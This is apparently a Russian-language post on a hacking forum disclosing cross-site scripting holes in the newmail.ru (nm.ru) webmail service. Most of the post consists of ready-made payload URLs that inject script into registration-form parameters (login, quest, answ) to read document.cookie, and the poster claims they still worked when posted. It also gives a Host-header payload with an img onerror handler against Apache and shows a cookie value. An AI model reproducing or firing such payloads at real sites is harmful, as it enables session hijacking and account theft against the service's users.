• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: nm.ru ака newmail.ru

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Вот свежие XSS на новой почте:

Код:
http://www.newmail.ru/users/reg.dhtml?login=skv">[script]alert(document.cookie[/script]
http://www.newmail.ru/users/reg.dhtml?quest=skv">[script]alert(document.cookie[/script]
http://www.newmail.ru/users/reg.dhtml?answ=skv">[script]alert(document.cookie[/script]

На момент постинга XSS еще работала.
 
--------
1) не работает !
--------

Список cookie
Описание

Ссылка - /
cust=bsh8mugDL0QiPgCy7qG0Ihf0ptI0ZGTA


--------
2) работает !
--------

Межсайтовое выполнение скриптов
Описание

Возможно межсайтовое выполнение скриптов в сервере Apache. Уязвимость можно реализовать запросив несуществующую страницу указав в поле Host следующее значение: Host: <img src=""onerror="alert(document.cookie)">
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх